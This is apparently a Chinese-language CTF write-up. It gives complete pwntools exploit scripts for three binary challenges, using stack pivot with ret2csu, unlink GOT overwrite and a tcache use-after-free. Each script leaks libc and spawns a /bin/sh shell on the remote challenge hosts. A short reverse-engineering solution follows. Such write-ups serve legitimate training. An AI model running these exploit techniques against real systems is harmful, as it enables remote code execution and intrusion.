PWN
twice(栈迁移,ret2csu)
第一次先泄露出canary和rbp地址
第二次栈迁移+ROP,先puts泄露出libc,然后ret2csu把新的ROPchain读进来
from pwn import *
from LibcSearcher import *
r = remote("121.36.59.116", 9999)
#r = process("./twice/pwn")
context(arch='amd64', os='linux', log_level='debug')
DEBUG = 0
if DEBUG:
gdb.attach(r,
'''
b *0x400844
b *0x40087A
b *0x40091A
c
''')
elf = ELF("./twice/pwn")
read_got = elf.got['read']
puts = elf.plt['puts']
pop_rdi = 0x400923
leave = 0x400879
csu1 = 0x40091A
csu2 = 0x400900
ret = 0x40087A
r.recvuntil(">")
r.send('a'*89)
r.recvuntil('a'*89)
canary = u64('\x00' + r.recv(7))
rbp = u64(r.recvuntil('\x7f').ljust(8, '\x00'))
buf = rbp - 0x70
success("canary:"+hex(canary))
success("rbp:"+hex(rbp))
r.recvuntil(">")
payload = p64(pop_rdi) + p64(read_got) + p64(puts)
payload += p64(csu1) + p64(0) + p64(1) + p64(read_got) + p64(0x1000) + p64(rbp) + p64(0) + p64(csu2)
payload = payload.ljust(88, 'a') + p64(canary) + p64(buf-8) + p64(leave)
r.send(payload)
r.recvuntil('\n')
read_addr = u64(r.recvuntil('\x7f').ljust(8, '\x00'))
success("read:"+hex(read_addr))
libc = LibcSearcher("read", read_addr)
libc_base = read_addr - libc.dump("read")
system = libc_base + libc.dump("system")
bin_sh = libc_base + libc.dump("str_bin_sh")
payload = p64(ret)*20 + p64(pop_rdi) + p64(bin_sh) + p64(system)
r.sendline(payload)
r.interactive()
pwnme
直接unlink改GOT表,和x86 32位一个做法,比赛的时候看错偏移没打通
from pwn import *
from LibcSearcher import *
r = remote("121.36.58.215", 1337)
#r = process("./twice/pwn")
context(arch='arm', os='linux', log_level='debug')
DEBUG = 0
if DEBUG:
gdb.attach(r,
'''
b *0x400844
b *0x40087A
b *0x40091A
c
''')
elf = ELF("./pwnme5/a.out")
libc = ELF('./pwnme5/lib/libuClibc-1.0.34.so')
atoi_got = elf.got['atoi']
content = 0x00021068
menu = ">>> "
def add(size, content):
r.recvuntil(menu)
r.sendline('2')
r.recvuntil("Length:")
r.sendline(str(size))
r.recvuntil("Tag:")
r.send(content)
def delete(index):
r.recvuntil(menu)
r.sendline('4')
r.recvuntil("Tag:")
r.sendline(str(index))
def show():
r.recvuntil(menu)
r.sendline('1')
def edit(index, size, content):
r.recvuntil(menu)
r.sendline('3')
r.recvuntil("Index:")
r.sendline(str(index))
r.recvuntil("Length:")
r.sendline(str(size))
r.recvuntil("Tag:")
r.send(content)
add(0x78, 'chunk0\n')
add(0x78, 'chunk1\n')
add(0x78, 'chunk2\n')
add(0x74, 'chunk3\n')
add(0xf8, 'chunk4\n')
add(0x20, 'chunk5\n')
payload = p32(0) + p32(0x71) + p32(content+0x1c-0xc) + p32(content+0x1c-0x8) + 'a'*0x60 + p32(0x70)
edit(3, len(payload), payload)
#pause()
delete(4)
#pause()
#shellcode = asm(shellcraft.sh())
payload = p32(0)*2 + p32(0x100) + p32(content) + p32(4) + p32(atoi_got)
edit(3, len(payload), payload)
show()
r.recvuntil("4 : ")
atoi = u32(r.recv(4))
success("atoi:"+hex(atoi))
libc.address = atoi - libc.sym['atoi']
system = libc.sym['system']
edit(4, 4, p32(system))
r.recvuntil(menu)
r.sendline('/bin/sh\x00')
r.interactive()
of
给的文件居然和远程不一样,远程可以直接UAF
from pwn import *
r = remote("121.36.74.70", 9999)
#r = process("./of/of")
context.log_level = 'debug'
DEBUG = 0
if DEBUG:
gdb.attach(r,
'''
b *$rebase(0xED0)
c
''')
elf = ELF("./of/of")
#libc = ELF('./libc_xing/libc-2.27.so')
libc = ELF('./of/libc-2.27.so')
one_gadget_18 = [0x4f2c5,0x4f322,0x10a38c]
menu = "Your choice: "
def add(index):
r.recvuntil(menu)
r.sendline('1')
r.recvuntil("Index: ")
r.sendline(str(index))
def delete(index):
r.recvuntil(menu)
r.sendline('4')
r.recvuntil("Index: ")
r.sendline(str(index))
def show(index):
r.recvuntil(menu)
r.sendline('3')
r.recvuntil("Index: ")
r.sendline(str(index))
def edit(index, payload):
r.recvuntil(menu)
r.sendline('2')
r.recvuntil("Index: ")
r.sendline(str(index))
r.recvuntil("Content: ")
r.send(payload)
def get_cookie():
cookie = ''
while True:
if len(cookie) == 8:
break
for i in range(256):
add(0)
payload = 'a'*0xf8 + cookie + chr(i)
edit(0, payload)
show(0)
recved = r.recv(len("Content: "))
if recved == "Content: ":
cookie += chr(i)
break
return cookie
#cookie = u64(get_cookie())
#success("cookie:"+hex(cookie))
for i in range(8):
add(i)
for i in range(8):
delete(7-i)
show(0)
r.recvuntil("Content: ")
malloc_hook = u64(r.recv(8)) - 0x60 - 0x10
success("malloc_hook:"+hex(malloc_hook))
libc.address = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc.sym['__free_hook']
system = libc.sym['system']
for i in range(8):
add(0)
add(0)
delete(0)
edit(0, p64(free_hook))
add(1)
add(2)
edit(2, p64(system))
edit(1, '/bin/sh\x00')
delete(1)
r.interactive()
RE
nop
和reverse.kr的replace很像
程序逻辑如下
Input addr 0x0804a038
addr +1 > 0x0804a038
call 0x0804857b anti_debug
[0x0804a038]+1
call 080485C4 anti_debug2
getpid
getppid
getsid
[0x0804a038]+0xCCCCCCCC
call 080485C4 anti_debug2
[0x0804a038]+1
call 080485C4 anti_debug2
call patch 0x90
[0x0804a038]+1
call patch 0x90
我们需要patch这里
根据程序逻辑逆出flag
#include<stdio.h>
int main(){
int addr = 0x08048765;
int a = 0xCCCCCCCC;
int flag = addr - a - 3;
printf("%d\n", flag);
}